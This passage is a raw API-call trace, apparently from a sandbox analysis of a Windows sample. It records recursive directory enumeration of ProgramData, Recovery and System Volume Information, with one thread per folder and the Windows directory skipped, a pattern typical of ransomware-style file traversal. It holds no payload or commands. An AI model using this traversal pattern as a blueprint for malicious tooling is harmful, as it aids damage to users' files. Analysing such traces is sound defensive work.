lpString2="\\\\?\\C:\\ProgramData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.557] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\*.*") returned 22 [0038.557] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\", lpString2="Adobe" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe") returned="\\\\?\\C:\\ProgramData\\Adobe" [0038.557] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\*.*" [0038.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4100118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0038.571] CloseHandle (hObject=0x1a0) returned 1 [0038.571] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0038.571] lstrcmpW (lpString1=".", lpString2="Application Data") returned -1 [0038.571] lstrcmpW (lpString1="..", lpString2="Application Data") returned -1 [0038.571] lstrcmpiW (lpString1="windows", lpString2="Application Data") returned 1 [0038.572] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.572] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\*.*") returned 22 [0038.572] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\", lpString2="Application Data" | out: lpString1="\\\\?\\C:\\ProgramData\\Application Data") returned="\\\\?\\C:\\ProgramData\\Application Data" [0038.572] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Application Data", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Application Data\\*.*") returned="\\\\?\\C:\\ProgramData\\Application Data\\*.*" [0038.572] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41602b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0038.592] CloseHandle (hObject=0x1a0) returned 1 [0038.592] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0038.592] lstrcmpW (lpString1=".", lpString2="Desktop") returned -1 [0038.592] lstrcmpW (lpString1="..", lpString2="Desktop") returned -1 [0038.592] lstrcmpiW (lpString1="windows", lpString2="Desktop") returned 1 [0038.594] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.594] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\*.*") returned 22 [0038.594] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\", lpString2="Desktop" | out: lpString1="\\\\?\\C:\\ProgramData\\Desktop") returned="\\\\?\\C:\\ProgramData\\Desktop" [0038.594] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Desktop", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Desktop\\*.*") returned="\\\\?\\C:\\ProgramData\\Desktop\\*.*" [0038.594] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41c0458, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0038.605] CloseHandle (hObject=0x1a0) returned 1 [0038.605] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0038.605] lstrcmpW (lpString1=".", lpString2="Documents") returned -1 [0038.605] lstrcmpW (lpString1="..", lpString2="Documents") returned -1 [0038.605] lstrcmpiW (lpString1="windows", lpString2="Documents") returned 1 [0038.605] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.605] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\*.*") returned 22 [0038.605] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\", lpString2="Documents" | out: lpString1="\\\\?\\C:\\ProgramData\\Documents") returned="\\\\?\\C:\\ProgramData\\Documents" [0038.605] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Documents", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Documents\\*.*") returned="\\\\?\\C:\\ProgramData\\Documents\\*.*" [0038.605] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33c8250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0038.615] CloseHandle (hObject=0x1a0) returned 1 [0038.615] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0038.615] lstrcmpW (lpString1=".", lpString2="Favorites") returned -1 [0038.615] lstrcmpW (lpString1="..", lpString2="Favorites") returned -1 [0038.615] lstrcmpiW (lpString1="windows", lpString2="Favorites") returned 1 [0038.617] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.617] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\*.*") returned 22 [0038.617] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\", lpString2="Favorites" | out: lpString1="\\\\?\\C:\\ProgramData\\Favorites") returned="\\\\?\\C:\\ProgramData\\Favorites" [0038.617] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Favorites", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Favorites\\*.*") returned="\\\\?\\C:\\ProgramData\\Favorites\\*.*" [0038.617] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4298800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0038.627] CloseHandle (hObject=0x1a0) returned 1 [0038.627] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0038.627] lstrcmpW (lpString1=".", lpString2="Microsoft") returned -1 [0038.627] lstrcmpW (lpString1="..", lpString2="Microsoft") returned -1 [0038.627] lstrcmpiW (lpString1="windows", lpString2="Microsoft") returned 1 [0038.629] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.629] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\*.*") returned 22 [0038.629] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\", lpString2="Microsoft" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft") returned="\\\\?\\C:\\ProgramData\\Microsoft" [0038.629] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0038.629] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c301e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0038.639] CloseHandle (hObject=0x1a0) returned 1 [0038.640] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0038.640] lstrcmpW (lpString1=".", lpString2="Microsoft Help") returned -1 [0038.640] lstrcmpW (lpString1="..", lpString2="Microsoft Help") returned -1 [0038.640] lstrcmpiW (lpString1="windows", lpString2="Microsoft Help") returned 1 [0038.641] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.641] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\*.*") returned 22 [0038.641] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\", lpString2="Microsoft Help" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help") returned="\\\\?\\C:\\ProgramData\\Microsoft Help" [0038.641] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0038.641] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ca83f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0038.658] CloseHandle (hObject=0x1a0) returned 1 [0038.658] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0038.658] lstrcmpW (lpString1=".", lpString2="Mozilla") returned -1 [0038.658] lstrcmpW (lpString1="..", lpString2="Mozilla") returned -1 [0038.658] lstrcmpiW (lpString1="windows", lpString2="Mozilla") returned 1 [0038.659] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.659] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\*.*") returned 22 [0038.659] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\", lpString2="Mozilla" | out: lpString1="\\\\?\\C:\\ProgramData\\Mozilla") returned="\\\\?\\C:\\ProgramData\\Mozilla" [0038.659] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Mozilla", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\*.*") returned="\\\\?\\C:\\ProgramData\\Mozilla\\*.*" [0038.660] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d08590, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0038.666] CloseHandle (hObject=0x1a0) returned 1 [0038.666] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0038.666] lstrcmpW (lpString1=".", lpString2="Oracle") returned -1 [0038.666] lstrcmpW (lpString1="..", lpString2="Oracle") returned -1 [0038.666] lstrcmpiW (lpString1="windows", lpString2="Oracle") returned 1 [0038.666] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.666] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\*.*") returned 22 [0038.666] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\", lpString2="Oracle" | out: lpString1="\\\\?\\C:\\ProgramData\\Oracle") returned="\\\\?\\C:\\ProgramData\\Oracle" [0038.666] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Oracle", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Oracle\\*.*") returned="\\\\?\\C:\\ProgramData\\Oracle\\*.*" [0038.666] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33f8320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0038.669] CloseHandle (hObject=0x1a0) returned 1 [0038.669] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0038.669] lstrcmpW (lpString1=".", lpString2="Package Cache") returned -1 [0038.669] lstrcmpW (lpString1="..", lpString2="Package Cache") returned -1 [0038.669] lstrcmpiW (lpString1="windows", lpString2="Package Cache") returned 1 [0038.671] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.671] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\*.*") returned 22 [0038.671] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\", lpString2="Package Cache" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache") returned="\\\\?\\C:\\ProgramData\\Package Cache" [0038.671] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0038.671] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d68730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0038.674] CloseHandle (hObject=0x1a0) returned 1 [0038.674] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0038.674] lstrcmpW (lpString1=".", lpString2="Start Menu") returned -1 [0038.674] lstrcmpW (lpString1="..", lpString2="Start Menu") returned -1 [0038.674] lstrcmpiW (lpString1="windows", lpString2="Start Menu") returned 1 [0038.675] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.675] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\*.*") returned 22 [0038.675] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\", lpString2="Start Menu" | out: lpString1="\\\\?\\C:\\ProgramData\\Start Menu") returned="\\\\?\\C:\\ProgramData\\Start Menu" [0038.675] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Start Menu", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Start Menu\\*.*") returned="\\\\?\\C:\\ProgramData\\Start Menu\\*.*" [0038.675] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d98800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0038.676] CloseHandle (hObject=0x1a0) returned 1 [0038.676] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0038.676] lstrcmpW (lpString1=".", lpString2="Sun") returned -1 [0038.676] lstrcmpW (lpString1="..", lpString2="Sun") returned -1 [0038.676] lstrcmpiW (lpString1="windows", lpString2="Sun") returned 1 [0038.677] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.677] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\*.*") returned 22 [0038.677] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\", lpString2="Sun" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun") returned="\\\\?\\C:\\ProgramData\\Sun" [0038.678] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Sun", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Sun\\*.*") returned="\\\\?\\C:\\ProgramData\\Sun\\*.*" [0038.678] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5db0868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0038.678] CloseHandle (hObject=0x1a0) returned 1 [0038.679] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0038.679] lstrcmpW (lpString1=".", lpString2="Templates") returned -1 [0038.679] lstrcmpW (lpString1="..", lpString2="Templates") returned -1 [0038.679] lstrcmpiW (lpString1="windows", lpString2="Templates") returned 1 [0038.680] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\*.*") returned="\\\\?\\C:\\ProgramData\\*.*" [0038.680] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\*.*") returned 22 [0038.680] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\", lpString2="Templates" | out: lpString1="\\\\?\\C:\\ProgramData\\Templates") returned="\\\\?\\C:\\ProgramData\\Templates" [0038.680] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Templates", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Templates\\*.*") returned="\\\\?\\C:\\ProgramData\\Templates\\*.*" [0038.680] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5dc88d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0038.681] CloseHandle (hObject=0x1a0) returned 1 [0038.681] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0 [0038.681] FindClose (in: hFindFile=0x5a5430 | out: hFindFile=0x5a5430) returned 1 Thread: id = 20 os_tid = 0xa84 [0038.564] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*.*", lpFindFileData=0x3bcfd30 | out: lpFindFileData=0x3bcfd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5370 [0038.591] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0038.591] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x3bcfd30 | out: lpFindFileData=0x3bcfd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.591] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0038.591] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0038.591] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x3bcfd30 | out: lpFindFileData=0x3bcfd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0038.591] lstrcmpW (lpString1=".", lpString2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -1 [0038.591] lstrcmpW (lpString1="..", lpString2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -1 [0038.591] lstrcmpiW (lpString1="windows", lpString2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 1 [0038.592] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Recovery\\*.*" | out: lpString1="\\\\?\\C:\\Recovery\\*.*") returned="\\\\?\\C:\\Recovery\\*.*" [0038.592] lstrlenW (lpString="\\\\?\\C:\\Recovery\\*.*") returned 19 [0038.592] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery\\", lpString2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0038.592] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*" [0038.592] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33e02b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0038.604] CloseHandle (hObject=0x198) returned 1 [0038.604] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x3bcfd30 | out: lpFindFileData=0x3bcfd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 0 [0038.604] FindClose (in: hFindFile=0x5a5370 | out: hFindFile=0x5a5370) returned 1 Thread: id = 21 os_tid = 0xa88 [0038.590] FindFirstFileW (in: lpFileName="\\\\?\\C:\\System Volume Information\\*.*", lpFindFileData=0x3d0fd30 | out: lpFindFileData=0x3d0fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 22 os_tid = 0xa8c [0038.601] FindFirstFileW (in: 